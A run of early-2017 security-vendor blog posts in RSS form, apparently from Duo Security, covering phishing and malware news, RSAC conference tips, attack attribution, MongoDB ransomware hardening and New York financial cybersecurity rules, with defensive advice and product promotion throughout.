Phishing for Financial Credentials

The Trojan is designed to steal banking credentials, targeting customers of financial institutions via spam campaigns using real company names in the sender address and email copy. Many of these emails are disguised as invoices, receipts and orders, according to Symantec.

In the newest attacks detected in late January and last December, small phishing and spear-phishing email campaigns are targeting U.K. financial institutions. The email messages contained attachments with embedded macros that infect users with Dridex.

Although macros is disabled by default by Microsoft, the malware has still proved to be successful in the U.K. as instructions in the documents social engineer users into enabling macros, while other email campaigns contained obfuscated macros, according to Threatpost.

The attacks have also been using a new technique that can bypass Windows User Account Control (UAC) on fully patched and previous Windows versions, as detailed in a technical analysis by Flashpoint. In this attack, Dridex is able to alter Windows System32 directories to give itself the highest possible privileges, whitelisting itself as a trusted application so it can run silently on targeted PCs.

Financial Information Security Tips

How can you and your users protect your financial organization against malware infection? Here’s a few preventative measures:

  • Keep your security software and all device software - including operating systems, plugins, browsers, etc. up to date. Out-of-date software runs a higher risk of getting compromised by known/reported vulnerabilities. Learn more about Trusted Devices.
  • Don’t click on any suspicious-looking emails - send them to your security or IT team.
  • Never ever enable macros on any Microsoft Office document attachment that asks you to enable it.
  • Use two-factor authentication to protect access to your online banking applications and all other logins. In the event that your credentials are compromised via phishing or malware, an online criminal can’t successfully log into your accounts without possessing your physical device to complete two factor and verify your identity.

Learn more about how financial organizations can comply with data security regulations in their industry and protect access to their financial information by visiting Securing Access to Financial Data.

]]>
<![CDATA[Hello, San Francisco! Survival Tips for Attending RSAC 2017]]> https://duo.com/blog/hello-san-francisco-survival-tips-for-attending-rsac-2017 https://duo.com/blog/hello-san-francisco-survival-tips-for-attending-rsac-2017 Mon, 30 Jan 2017 09:00:00 -0500

Heading to RSAC 2017 in San Francisco this year? Whether you’re a first-time attendee or a seasoned pro, it can be a challenge to get through without at least some stress. But don’t sweat it; I’ve got some general tips to guide you.

Plan, and Then Plan Some More

First things first: Let’s talk about your tech. Leave home as much of it as possible. These days, you can get by with a phone and the proper apps. If you like to take notes and insist on some type of larger device, maybe bring a tablet or Chromebook, but the idea is to free yourself up tech-wise as much as you can stand. Before the conference, load up all of the apps you’ll need, including the official conference app, which has the complete schedule and maps of everything within the physical conference space. Patch everything and do your backups. Bring your chargers, and buy one or two of those portable batteries for your phone/tablet to carry with you – your devices will drain faster than you might think. And don’t forget the earbuds!

If you must bring a laptop, make sure you have a personal firewall up and running with all ports off, disable Wi-Fi and Bluetooth unless you really, really must use it, and turn it off when you’re done.

For more on traveling with your tech, check out my recent blog post discussing holiday travel – a lot of advice there applies.

Your clothing choices are also key. Dress comfortably in breathable clothes, and wear comfortable shoes; you’ll be doing a lot of standing, walking and sitting in crowded rooms. Bring an empty water bottle you can refill to keep hydrated, and I usually pack a supply of granola bars so I have couple with me during the day. I’d also recommend a comfortable backpack, purse or satchel made of knife-resistant material (to thwart those knife-wielding pickpockets) for everything you’re carrying around.

I hope you don’t have to bring any traditional business attire – lots of folks go to RSAC but barely attend the conference itself because they’re in meetings with potential clients, vendors and partners. If that sounds like you, I’d do everything possible to avoid stiff suits or skirts at the conference proper, because 1) they'll be wildly uncomfortable by the end of the day, and 2) everyone will think you work there and keep asking you for directions to the restrooms – I’ve seen it happen!

Preview the schedule on the conference app on your phone, and if you’re a full session attendee you’ll probably hit up a number of the session talks. It’s a good idea to have each talk you want to attend lined up, plus a backup in case your first pick is full. If two talks you want to see are at the same time and you need to break the tie, try to attend the one where you might be more likely to ask questions. Keep in mind, most of the talks are recorded and you can view them later, so no big deal if you miss one.

You Are Here

After you’ve checked in at the hotel, try to check in for the conference as soon as you can. If you arrive early enough in the day on Saturday or Sunday, you may be able to check in (you can find check-in times on the RSAC website or app). Monday and Tuesday have long conference check-in lines, so get there early if you can’t do it on the weekend. When you check in and get your lanyard, you’re often handed what I refer to as “the bag of crap,” loaded with stuff like swag from sponsors and various fliers. I usually go through it, see what I can live without and then hand them back the bag. The main thing is just getting the lanyard, no point in having extra junk to lug around.

Turn off unneeded services on your tech! Disable Bluetooth, and I would avoid using the conference Wi-Fi, so leave that off as well. I would also avoid any free Wi-Fi anywhere at or near the conference, like hotels and coffee shops. This is a security conference, and while it’s not quite as volatile as DEF CON’s network, there’s still a risk. But you’re a security professional, so no problem – turn off your phone’s Wi-Fi, use the data plan on your phone, and if you must use another device like a laptop, tether it to your phone for interwebbing. Use a VPN, use strong passwords, and use 2FA!

Other Conference Fun Stuff

The keynotes on Tuesday morning and Friday afternoon are usually the most crowded events, so decide if you want to stand in a long line to see it in person, watch it from one of the two viewing areas (at least they had two in 2016), or follow the live stream on your phone (one of many reasons to have your earbuds at the ready). And feel free to just skip them – the Friday one is usually a celebrity that has nothing to do with our industry, so unless you really want to see Seth Meyers make jokes about nerds and generally not get our industry, you can probably have a more productive time doing “hallway con” with some colleagues.

A word about the expo floor – this is a sea of millions of vendors (well, a few hundred, but damn) usually housed in not one but two areas. You’ll see everything from excellent companies with fun, creative booths to sad, small companies spending the last of their VC money in a desperate attempt to make it to the next round of funding. Some attendees make a game out of trying to get as many vendor t-shirts, whistles, letter openers, keychains, pens and every other branded piece of swag imaginable, so if that’s your thing you’ll find this to be a treasure-ladened environment. Unless the swag is really great (like a book you wanted to read, or a black hoodie like those kind the hackers wear in Shutterstock photos), I usually avoid it… although I do admit I’m a sucker for tech-themed stickers.

Some Conference No-No’s

Don’t collect USB sticks, especially if they’re lying around in the restroom (eww!) or on a table in a common area near food. Don’t sit down and tell someone you just met every last detail about your insecure network. And while talking to a vendor in a booth about a solution is great (always ask tough questions!), I’d avoid spilling your technical guts to them unless you’re in a private area where you won’t be overheard.

Don’t hack at the conference. Trust me, this will be a target-rich environment for sure. But while this type of illegal behavior is nearly a tradition at hacker conferences, it’s frowned upon with great legal vengeance at more conservative events like RSAC.

A general rule of thumb – if the person introducing the keynote is dressed for a funeral, don’t hack there. If they are wearing a black t-shirt, you probably still shouldn’t do it, but if you do and get caught they probably won’t press charges.

Final Words

Have fun! It can be a long week. Remember to try and get plenty of restful sleep at night so that you’re recharged for the next day. Don’t attend too many vendor-sponsored parties, and don’t drink or 420 yourself silly. Do that “networking with people” thing I keep hearing about, be flexible to changes (especially if you have no control over them), and most importantly stay vigilant and safe!

]]>
<![CDATA[Join Duo Security at the 2017 RSA Conference]]> https://duo.com/blog/join-duo-security-at-the-2017-rsa-conference https://duo.com/blog/join-duo-security-at-the-2017-rsa-conference Tue, 24 Jan 2017 10:00:00 -0500

Once again, Duo Security is doing it big on the West Coast this year at the 2017 RSA Conference hosted at the Moscone Center in San Francisco, California from February 13-17.

The RSA Conference is the world’s largest information security conference, drawing in over 45,000 attendees each year to share insights on current IT security issues, attracting the world’s best and brightest in the field.

Visit Duo at Booth # 1247

For fun t-shirts, quick demos and friendly conversations, stop by Duo’s booth # 1247 located in the South Hall, Hall B.

Duo RSA Booth Map

We’ll be there from:

  • 10-6 p.m. PST Tuesday and Wednesday
  • 10-3 p.m. PST Thursday
  • 5-7 p.m. PST Monday for the Welcome Reception

Duo at RSA

We’d love to chat in person, as well as answer any questions you might have. To set up a meeting with a Duo rep during the RSA conference week, please submit a request.

Need a pass to the RSA exhibit hall? Take advantage of our special offer for a complimentary exhibit hall-only pass with our expo code: XE7DUOSEC

Deadline to redeem the expo pass code is February 15, 2017. Register on the RSAC site.

Party With Duo!

There ain’t no party like a Duo party! Trust us. And join us at the underground lounge, Local Edition on Tuesday, February 14 from 7-11:00 p.m. PST where we'll be slinging drinks, spinning some banging music and handing out Duo swag. We’ll also be handing out Duo’s Women in Security awards to recipients at 8:00 p.m.!

Duo at RSA Party

The venue is a 1950s-style cocktail lounge in a former newspaper printing room located in the Hearst Building. And we wouldn’t have it any other way. RSVP today.

RSAC 2017: The Talks

Some of the top keynote speakers this year include:

  • Neil deGrasse Tyson, astrophysicist and author, researcher of star formation, exploding stars, dwarf galaxies and the structure of our Milky Way - need I say more?
  • Dame Stella Rimington, the real-life character that inspired “M,” played by Judi Dench in the James Bond 007 films
  • Seth Myers, Emmy Award-winning writer and current Late Night host, will give the closing keynote

The RSA Conference will also feature sessions each day covering:

  • Data Security & Privacy
  • Hackers & Threats
  • The Human Element
  • Governance, Risk & Compliance
  • Application Security
  • CISO Viewpoints
  • Industry Experts

View the full RSAC agenda here.

Attend Duo's Talks at RSAC 2017

Don’t miss Duo’s own Principal Security Strategist, Wendy Nather, who will be presenting What CISOs Wish They Could Say Out Loud on Tuesday, February 14 at 1:15pm. Reserve your seat today to avoid the line!

Abstract:

It’s hard to get CISOs to speak in public about their security programs. They can’t admit what they did wrong or reveal what they did right. It’s time for true confessions. This presentation will speak for the voiceless in response to annoying questions like, “Why can’t I have a long password?” “Why does it take a year to fix this security flaw?” and “Can you really fly a plane sideways?”

Wendy will also be leading an interactive small group discussion, Multifactor Authentication Redefined on February 16 at 7:00 a.m. at Moscone West, 2011 Table C.

Abstract:

With NIST threatening to deprecate SMS as an authentication factor and enterprise use cases mingling with consumers, how do organizations plan to cover all their MFA needs? This discussion will range from advanced risk-based MFA to first-time deployments in sectors that haven’t been able to use it before. Attendance is strictly limited to allow for a small group experience.

Hope to see you there!

]]>
<![CDATA[Well, How Did I Get Here? Why I Joined Duo]]> https://duo.com/blog/well-how-did-i-get-here-why-i-joined-duo https://duo.com/blog/well-how-did-i-get-here-why-i-joined-duo Mon, 23 Jan 2017 10:00:00 -0500

CEOs: I’ve seen a few. During my five years as an industry analyst for 451 Research, I sat across the table from more security CEOs than I can count. I listened to their visions; I looked at their slides; I checked numbers; I noted what they didn’t say as well as what they did say. As soon as I met the team of Dug Song and Jon Oberheide, I was impressed by their way of simply talking to me as a human being, rather than as a necessary evil standing in between them and the next conference cocktail party.

When I started using Slack to join personal teams, I discovered that it supported two-factor authentication using Duo, so I tried it out, and I immediately liked it. I’d been using hard tokens for 20 years (and I’m still finding dead ones in the garage), but there was something so satisfying about just touching a green checkmark on my phone.

I’ve seen many user interfaces that were -- shall we say -- “engineering grade,” but this was something that felt good to use. How special is that in security?

Sometimes it’s the simplest things in life that are best. Not driving your enemies before you, and hearing the lamentations of their salespeople, but just clicking on a nice button, having it work, and being treated well. In this day and age, and in this industry, those are rarities.

Yes, I joined Duo because I believe in the greater vision of the company and its founders.

It’s gone well beyond multi-factor authentication and is focusing on bringing more of the security basics -- visibility, integrity testing, enforcement and protection -- into an easy-to-use package that fits into the new cloud and mobile environment, even for companies below the security poverty line.

I believe that if we’re going to improve security around the world, we have to put it within reach of everyone, not just those who can afford to buy one of everything. We have to empathize with customers and understand the constraints they’re working under.

It’s not just what we do; it’s how we do it, and choosing every day to make both life and technology simpler, easier, and more satisfying.

So I knew I had made the right decision when I announced it and got dozens of responses saying, “You’re going to Duo? I love them!” I have the opportunity to change from being a Necessary Evil to making a difference as part of a company that builds connections with its (over 7,000) customers while securing them. That, to me, is the best possible way to kick off 2017.

]]>
<![CDATA[The Latest Phishing Attacks Target Gmail, Microsoft Word & Android Apps]]> https://duo.com/blog/the-latest-phishing-attacks-target-gmail-microsoft-word-and-android-apps https://duo.com/blog/the-latest-phishing-attacks-target-gmail-microsoft-word-and-android-apps Fri, 20 Jan 2017 09:00:00 -0500

Recently, phishing attacks against Gmail users, a major U.S. financial services provider, and Android app users have revealed unique ways to deliver malware and steal login credentials.

Gmail Phishing

The latest highly-effective attacks include specially crafted URLs to trick users into typing in their Gmail credentials on a spoofed site.

The phishing emails contain a PDF document that appears to be an attachment, but is actually an embedded image - once a user clicks on it, they’re directed to a very convincing yet fake Gmail login page, according to SecurityWeek.com. An example can be seen below, as posted by user @tomscott to Twitter and reported by Fortune.com:

Gmail Phishing PDF Image

The URL of the fake Gmail login page reads “data:text/html,https://accounts/google.com” plus a longer string of text that is hidden by extra whitespace. According to the researchers at Wordfence, this phishing technique uses data URI to embed a complete file in the browser location bar. When you click on the embedded image, a script serves up a file designed to look like a Gmail login page, but really works to steal your login credentials.

There have been reports of users getting compromised almost immediately after entering their credentials. Attackers are logging into their accounts and accessing their contact lists in order to find new victims, sending them emails from the compromised user.

Google has released a statement about the attacks:

"We’re aware of this issue and continue to strengthen our defenses against it. We help protect users from phishing attacks in a variety of ways, including: machine learning based detection of phishing messages, Safe Browsing warnings that notify users of dangerous links in emails and browsers, preventing suspicious account sign-ins, and more. Users can also activate two-step verification for additional account protection."

Microsoft Word Phishing

Another set of phishing emails were sent to a major U.S. financial services and insurance provider. These emails contained a Microsoft Word attachment designed to deliver a malicious payload that installed a keylogger on the user’s machine.

Keyloggers collect information that the user types, including passwords and personal information, sending it to the attacker’s email.

What’s different about this particular phishing email is it uses an embedded object in the form of a Visual Basic Script (VBS) that can be opened and executed from within the Word file, according to ZDNet.com.

The Word file prompted users to click on an image in order to install Microsoft Silverlight to view the document content. Other malicious Word attachments usually ask the user to enable macros to view content, which allows them to evade detection as they download malware on their machine.

Android App Phishing

Meanwhile, a number of infected Android Apps in the Google Play Store were reportedly stealing Instagram users’ passwords, according to Softpedia.com. These free apps were advertised as a way to increase their number of followers, get Instagram analytics or automate posting, and they prompted users to type in their Instagram login credentials after they were installed.

The apps have been removed from the Google Play Store, and they are flagged as malicious by antivirus solutions for Android devices. However, if you have downloaded or shared your credentials, it’s a good idea to change your password now.

Security Tips to Protect Against Phishing

Phishing emails may be relentless, but they don’t have to be successful. Keep your defenses up by doing the following:

Enable two-factor authentication on every login. Also known as multi-factor authentication, you can effectively protect access to your Gmail and other applications with a smartphone app that sends you a notification on your phone to verify your identity. That way, even if online criminals manage to steal your username and password, they still can’t log into your accounts without physical possession of your mobile device.

Assess your risks by conducting a phishing simulation. To evaluate your company’s likelihood of getting phished successfully, use a free phishing simulator tool to send targeted emails to your own employees. Use the data to educate your users and to make security budget decisions.

Check the address bar. Don’t enter our credentials into any site with a questionable URL. In the case of the Gmail phishing attack, the “data:text/html” might have seemed innocuous enough, but most secure sites start with “https://” and display a lock icon.

In general, don’t enter your password into a page you clicked on via email, and be wary of password prompts when you’re already logged into and viewing Gmail content.

Identify and update software on your devices. Exploit kits and malware downloaders leverage out-of-date software on user devices in order to compromise them. The Trouble With Phishing The 2016 Duo Trusted Access Report: Microsoft Edition found that nearly 62 percent of devices running Internet Explorer have an old version of Flash installed, leaving them exposed to known vulnerabilities that target Flash.

Detect outdated software on your devices and block them from accessing critical applications in order to reduce your risks by using a comprehensive endpoint security solution.

Learn more by downloading The Trouble With Phishing to get:

  • The latest phishing statistics by industry
  • A breakdown of how phishing works
  • The anatomy of a phishing attack

This guide details the problems around phishing, how it works, and how Duo can be leveraged as a solution.

]]>
<![CDATA[The Current State of Cyber Security in Canada]]> https://duo.com/blog/the-current-state-of-cyber-security-in-canada https://duo.com/blog/the-current-state-of-cyber-security-in-canada Thu, 19 Jan 2017 00:00:00 -0500

The most current Canadian Cyber Security Strategy may be from 2010, but recently the Government of Canada is working toward renewing its approach to cyber security by holding a public consultation to review measures to protect critical infrastructure and Canadians from cyber threats.

And most recently, the Canadian Institute for Cybersecurity opened in New Brunswick as part of an economic development strategy called CyberNB, according to ITWorldCanada.com.

“[Cyber security] is the fastest growing area of IT and it will be for the next 20 years,” said Stephen Lund, CEO of Crown Corporation Opportunities NB.

Increasing Threats to Canada’s Cybersecurity

But what are Canadian organizations actually doing to protect themselves against new threats, and is it enough? About one in three targeted attacks in the past year resulted in a security breach for Canadian companies, according to an Accenture survey.

Last year, many Canadian universities and hospitals were victims of ransomware attacks that caused computers to go offline, disrupting service. In one event, ransomware infiltrated the hospital network via a phishing spam email with a malicious attachment, according to BeckersHospitalReview.com.

Investing in Cloud-Based Security

A report by PriceWaterCoopers (PwC) reveals that 64% of organizations in Canada are investing in cloud-based cybersecurity services.

Access Security

Canadian Insights: The Global State of Information Security Survey reveals that Canadian organizations are increasingly adopting advanced authentication to protect access to their systems at 62%, up 7% from the year prior. Another 46% are investing in identity and access management.

One aspect of advanced authentication refers to using an additional factor to verify a user’s identity at login. The first factor may be their username and password, and a second factor (known as two-factor or multi-factor authentication) may be a push notification sent to their phone via a mobile authentication app.

The PwC survey reports that 57% are investing in multi-factor authentication, up 4% from the year prior, with 61% using software tokens, and 48% investing in smartphone tokens.

Endpoint Protection

The PwC survey also found that Canadian organizations are investing in endpoint protection (50%), real-time monitoring and analytics (56%) and threat intelligence (46%).

In a report by Malwarebytes on ransomware, the security company found that Canadian organizations were the most likely to find that ransomware had entered their organization via smartphone or tablet.

One way to protect against malware is to check the security health of every device to ensure only Trusted Devices can access your applications and data. By vetting your endpoints, you can also apply device access policies to block any risky devices, including mobile phones that don’t meet your security standards.

Cost of a Data Breach in Canada

In 2016, the average per capita cost of a data breach over three years rose to $211 per breached record, a 12% increase from the year prior according to the 2016 Cost of a Data Breach Study: Global Analysis (PDF) by the Ponemon Institute.

The report found that detection and escalation costs were the highest in Canada - these include forensic and investigative activities, assessment and audit services, crisis team management and communications to the executive management team and board of directors.

Companies in the U.S. and Canada spent the most attempting to resolve a malicious or criminal attack at $236 and $230 per record. With 48% of all breaches in 2016 caused by malicious or criminal attacks, that’s not cheap.

Learn more about protecting against remote access risks in Duo’s Securing Remote Access Guide and the 2016 Duo Trusted Access Report.

]]>
<![CDATA[UK Hospital Systems Running Windows XP Are Taken Offline]]> https://duo.com/blog/uk-hospital-systems-running-windows-xp-are-taken-offline https://duo.com/blog/uk-hospital-systems-running-windows-xp-are-taken-offline Wed, 18 Jan 2017 00:00:00 -0500

The largest hospital group in the UK was the victim of an online attack, forcing them to take some of its systems offline.

The Barts Health NHS Trust is a system of three district general hospitals staffing over 15,000 employees serving 2.5 million patients in east London.

The Health Service Journal reports that the attack affected thousands of files hosted on the hospital group’s Windows XP operating system, and the file sharing system between departments has been turned off, according to the Telegraph.

Last year, ransomware attacks against Northern Lincolnshire and Goole Hospitals forced them to shut down systems and cancel operations for four days.

They were infected with a variant known as Globe2, which commonly infects users via phishing emails containing malicious links, according to ZDNet.

Protecting Healthcare Against Security Breaches

How can you protect your organization against ransomware and other online attacks against patient data?

Update your operating systems. The hospital group was running Windows XP, released in 2001 - over 15 years ago - and it has over 700 reported vulnerabilities logged in the CVE Details database.

Extended support for the OS ended in April 2014, which means it no longer receives security updates. That means it’s an easy target for attackers that exploit known software vulnerabilities in older systems to get access to hospital files.

According to Duo’s 2016 Trusted Access Report, the healthcare industry has twice as many Windows endpoints running XP than Duo’s average customers. And another 78% of the Windows endpoints in healthcare are running on the outdated Windows 7 OS, released in 2009.

Get visibility into your endpoints. Check the security health of every device that logs into your systems to ensure only Trusted Devices can access your applications and patient data.

Create custom device access policies to block risky devices based on what security features they’ve enabled, or what version of software they’re running to reduce the risk of ransomware infection.

Step up your authentication game. Add not only two-factor authentication (also known as multi-factor authentication) to your system logins, but invest in a solution with advanced user access policies to ensure only Trusted Users are granted access.

Run a phishing simulation. Since phishing emails are often the harbinger of ransomware, malware and other credential-stealing attacks, measure your organization’s level of risk and likelihood of getting phished by launching a simulated internal phishing campaign. Then use the data to identify risks and educate your employees. Learn more about Duo Insight, a free phishing simulator tool, and read our guide, The Trouble With Phishing to learn about risks.

Check out Duo’s Guide to Securing Patient Data for more on relevant health IT security legislation, information security guidelines for remote access risks, and more on how you can protect against modern attacks and meet regulatory compliance with two-factor authentication.

]]>
<![CDATA[The Weird World of Attribution]]> https://duo.com/blog/the-weird-world-of-attribution https://duo.com/blog/the-weird-world-of-attribution Tue, 17 Jan 2017 00:00:00 -0500

It seems like everywhere you go online, you run into stories about hacking and how some nation state is behind it. A year ago, it was China. Now Russia's getting all of the headlines. And while we’d love to tell you it’s a load of bullshit, there’s a grain of truth behind it, which I’d like to take a stab at pointing out. (Full disclosure: I used to do attribution and research surrounding attribution at a previous employer.)

First off, you might wonder, why attribute? If we cover what’s tracked during the attribution process, things start to come into focus.

An Endless Supply of Indicators...

You can collect a lot of items while analyzing attacker data. There are the obvious ones — IP addresses, domains used, and so on — but that’s just the tip of the iceberg. Each of these is a clue, though often a vague one, but together they fit into a larger puzzle.

Let’s take a simple attack scenario, a targeted phishing email. A partial list of indicators include things like subject line, sender, recipient, some or all of the email body including the general topic (i.e., fake FedEx tracking notification), attachment or not, and the sender’s domain.

Pretty much everything in the headers alone can be used as an indicator: the date (including time and day), whether a compromised domain or a free email service like Hotmail was used, data within the Message-ID field, data within the User-Agent field, and on and on.

What was the attachment, an Office doc or PDF? Is there an older or recent vulnerability involving the attachment, or maybe a zero-day? Actually, zero-day are rather rare, because in most cases older vulns will work (unfortunately).

If there’s a URL in the email, is it a compromised domain or a domain created last week? Who registered it? What email service did they use? Is there a browser vulnerability at the pointy end of that URL? Which browser is impacted? Multi-stage payload?

Speaking of those payloads, security conferences have done entire presentations about determining the compiler used to compile an executable. This analysis can include not only the version of a particular compiler, but also the language — English, Chinese or whatever. Timestamps often include the timezone markers, so suppose it was compiled during the daylight hours of the +0300 GMT time zone (Moscow is in that time zone), a story starts to unfold.

...But They Could Lie

An astute technologist will point out that an adversary could falsify many of these indicators, making it look like a different group of attackers caused an incident, but there are some caveats to that. It requires that an adversary know all indicators surrounding another attacker to be able to look like them, and most of this data is non-public. Yes, there are dozens of indicators released in various threat intelligence feeds and in some of the more high-profile reports that security teams release to the public — but there are hundreds vs. dozens of indicators to track.

Statistically, grouping fresh indicators and classifying an incident, you won’t have a 100% match on all past indicators. Domains expire or outgrow their usefulness, popped systems used for command and control get wiped and reloaded, and data changes over time. But usually you’ll get a match of roughly 70-80%, which is a good indication that you’re dealing with a specific repeat customer.

Another nation state actor? The match of indicators dips to the 20-30% range, and a random attack, for example by a worm or script kiddie, will match 5-10% of indicators. (These numbers are meant more for illustration and may not be exact for your organization, but you get the idea.)

And here’s the important part: if they’re lying convincingly to the front line analyst handling incident response, it doesn’t matter. At one of my previous employers, there was a saying (picked up from the military), left of boom. You put all the indicators for an actor on a timeline, and you can see there‘s the “boom” point in the middle where the victim system is compromised. The place where you wanted to detect the adversary was always left of boom.

But if boom happens, you can better plan your incident response. With proper attribution you know what is likely to happen next and can act accordingly, thwarting the adversary’s efforts.. Even if an adversary is pretending to be a completely different adversary, predicting the right of boom stays the same.

To further complicate things, I’m speaking in broad strokes meant to evoke more than depict, as each attacker and attack is still to some degree unique, but hopefully you get the idea. A defender who’s tracking indicators on a large scale will see patterns emerge that can be acted upon — even in the middle of an active incident.

So What Does This Mean?

Knowing who your adversary is can be very helpful if your company is attacked, and certainly beneficial to planning defensive strategies. But in the big picture, knowing the nationality of your attacker means nothing.

Attribution as it is used in the incident response world refers to the previous paragraphs. Dealing with the nation state bankrolling the attacker organization, however, is handled by politicians, and most front line people care very little about it. Knowing the attacker is Russian- or Chinese-sponsored means nothing when you’re trying to locate every instance of a crafted backdoor on a few dozen infiltrated machines, but knowing what the attacker might do next is vital.

One More Thing

Oh yes, there’s one other category of indicators: the classified kind. Sure, you have your pile of nice indicators that allow you to differentiate Attacker ABC from Attacker XYZ, but the U.S. government does a lot of spy stuff — real spy stuff — and that data is what truly puts a face on Attacker ABC.

When a security company does attribution and links an incident to Fancy Public APT Name, they aren’t releasing the hundreds of thousands of indicators from the closely guarded database they used to statistically prove that it lines more than 80% with other indicators from said group; they release a few dozen. There are enough oddball indicators out there that could lead you to believe a particular nation state was involved, but often via nudge nudge wink wink these organizations find out from the U.S. government that yes, Fancy Public APT Name is backed by a specific foreign government.

Conclusions

Basic attribution is easy. Well, if you have that big fat searchable database of indicators you’ve been collecting, it’s easy. It can take minutes, and then you know what adversary you’re dealing with and can plan next steps. In fact, if it took more than a few minutes to determine who the adversary was, it might not be worth the effort. Entire companies are devoted to making products that apply AI, or at least making data analysis easier than sifting through indicators to be able to tell what might happen next, and getting that process down from minutes to seconds or even milliseconds.

The fact that a government waits weeks before announcing “it was China” or “it was Russia” is either spy-level fact checking or political maneuvering (or both!), and it’s not easy. Don’t confuse this with basic attribution. A lot of people within the infosec community dismiss entire reports simply because they’re looking at a few dozen easily-faked indicators and a “Russia did it” label. You can debate the validity of those few dozen indicators, but realize there may be a few hundred that have been withheld for “proprietary reasons” by the security boutique that released what’s on at least a partial level an advertising and PR report.

So the next time you see these headlines in the press and in reports from security companies, keep some of this in mind. There’s a lot going on behind the scenes.

]]>
<![CDATA[Why the MongoDB Ransomware Shouldn't Surprise Anyone]]> https://duo.com/blog/why-the-mongodb-ransomware-shouldnt-surprise-anyone https://duo.com/blog/why-the-mongodb-ransomware-shouldnt-surprise-anyone Mon, 16 Jan 2017 00:00:00 -0500

Recent reports have discovered MongoDB instances being targeted with ransomware. Current estimates at the time of this writing suggest that there have been over 28,000 unique cases of ransomware from multiple actors targeting hosts running MongoDB.

MongoDB, as well as many other NoSQL database solutions, have a track record of shipping with insecure default configuration settings including listening on all interfaces as well as providing read/write access without authentication. Insecure default settings as well as simple misconfigurations on the part of administrators expose the hosts to information theft.

This post aims to provide a bit of background on exposed MongoDB instances, as well as give some helpful tips and resources on securing a MongoDB deployment.

This Shouldn’t Be a Surprise

Exposed MongoDB instances have been discussed by researchers for years. Throughout 2015, researcher Chris Vickery discovered multiple accessible MongoDB instances, exposing hundreds of millions of records containing potentially sensitive information.

Shodan, a search engine for Internet-connected devices, has reported on exposed MongoDB databases multiple times, measuring over 680 TB of data exposed by open MongoDB instances.

Researchers at BinaryEdge did a similar study on the exposure of different storage solutions and found that hundreds of MongoDB instances had a database created with the name DELETED_BECAUSE_YOU_DIDNT_PASSWORD_PROTECT_YOUR_MONGODB, which is similar to the attacks we’re seeing now. A follow-up study showed that the number of open MongoDB instances only increased over time.

Even the case of ransomware targeting storage services isn’t new. Last year, we discovered that actors were targeting Redis with fake ransomware. In the case of the Redis attacks, attackers were simply deleting the data and asking for a ransom. This appears to be the same scenario as at least some of the MongoDB attacks, with victims paying the ransom and reporting that they did not receive a copy of their data..

Nearly every instance of compromised MongoDB databases could be prevented by employing standard security best practices.

How to Protect MongoDB

The team behind MongoDB responded to the ransomware attacks in a blog post that directs readers to the MongoDB security manual as well as a security checklist that can be used to make sure a deployment is using best practices.

At a high level, we recommend using these simple controls to help create a baseline of MongoDB security:

Limit Network Exposure

The easiest way to prevent attackers from compromising a MongoDB instance is to limit their ability to connect at the network layer. The MongoDB configuration file specifies a net.bindIp entry which can be used to force MongoDB to bind to localhost. It should be noted that, as of version 2.6, MongoDB ships in many distributions with this already set to localhost instead of binding to all interfaces.

If you need to allow access to a MongoDB instance from another host, we recommend using firewall rules to allow access from only authorized hosts.

Configure Role-Based Access Control

MongoDB supports role-based access control (RBAC) which allows for the creation of multiple users with different levels of access. We recommend configuring user accounts with the least privileges required as well as ensuring that strong passwords are used for authentication.

Perform Regular Backups

Any critical data should be regularly backed up and stored in case the original copy is somehow lost. MongoDB provides the mongodump and mongorestore utilities to easily backup and restore database contents.

Check out MongoDB’s security checklist for the full list of security recommendations.

Moving Forward

At the time of writing, Shodan estimates that there are over 47k MongoDB hosts exposed to the Internet, indicating that the number of hosts targeted by ransomware may continue to climb.

While these latest attacks may prompt MongoDB administrators to lock down their deployments, this likely won’t be the last time we see ransomware target data storage solutions.

Back in October, we performed research into the exposure of different NoSQL databases and key/value stores. During the research, we found a substantial number of hosts using different technologies such as Memcached, MongoDB, Redis, and Elasticsearch.

Exposed Key/Value and NoSQL Databases

Since these hosts store critical (and often sensitive) information, are accessible to anyone without authentication, and vulnerabilities (such as these for Memcached) continue to be released, it is likely that ransomware will continue to target these technologies until action is taken to secure them.

Using best security practices for these technologies significantly reduces the attack surface and helps protect your data from attackers.

For more information including a more complete list of information leaks resulting from open MongoDB instances, you can find the full slides from our talk here.

]]>
<![CDATA[New Cybersecurity Regulation for NY Financial Services]]> https://duo.com/blog/new-cybersecurity-regulation-for-ny-financial-services https://duo.com/blog/new-cybersecurity-regulation-for-ny-financial-services Wed, 11 Jan 2017 09:00:00 -0500

The New York State Dept. of Financial Services (DFS) has released a revised draft of its proposed cybersecurity regulation for banks, insurance companies and other financial services, Cybersecurity Requirements for Financial Services Companies (PDF).

The updated regulation requires organizations to develop a cybersecurity program and written policy to protect the integrity and privacy of confidential data.

The DFS also pushed back the implementation deadline from the original date of Jan. 1, 2017 to March 1, 2017. Organizations must meet compliance requirements within 180 days of the regulation’s effective date.

The new regulations also require organizations to notify the DFS within 72 hours of determining that a security incident has occurred.

Authentication

The DFS requires organizations to use multi-factor authentication or risk-based authentication to protect against unauthorized access to nonpublic information systems.

Multi-factor authentication (MFA), also known as two-factor authentication, can protect against phishing and other password exploitation attacks by verifying a user’s identity via another factor - such as the approval of a push notification sent via a mobile app. Learn more about two-factor authentication.

Risk-based authentication is when an authentication system takes into account the profile of the device/user requesting access. If the risk is high, the authentication process becomes more restrictive.

The DFS also requires MFA for any user accessing the organization’s internal networks from an external network, “unless the Covered Entity’s CISO has approved in writing the use of reasonably equivalent or more secure access controls.”

Penetration Testing and Vulnerability Assessments

The DFS requires that each organization includes continuous monitoring and periodic testing in their cybersecurity programs. That includes bi-annual vulnerability assessments, including systematic scans reviews of information systems to identify known vulnerabilities.

A different way you can protect against known vulnerabilities is to implement a security tool to detect, notify and block users logging into your systems with out-of-date and risky mobile phones, laptops, tablets, etc. to ensure only trusted devices are granted access to your applications.

Access Privileges

Organizations must also limit and periodically review user access privileges to information systems that provide access to nonpublic information.

Generally, the rule of least privilege is a good standard security best practice to follow, which dictates limiting user access to only the applications they need to do their job.

One way to do so is by implementing custom application access policies and user access policies to limit the scope of risk should the user credentials of one employee get compromised.

Third-Party Service Provider Security

The DFS also requires financial organizations to maintain a security policy to ensure that information systems that are accessible or managed by third-party service providers are also properly secured.

That includes an inventory list of providers, risk assessments, minimum cybersecurity practices, periodic assessments, policies and procedures and more.

Financial organizations also need to ensure that third parties use access controls, including multi-factor authentication to limit access to sensitive systems and confidential information.

The updated proposed regulation will be finalized after a 30-day public comment periods, according to the DFS.

]]>
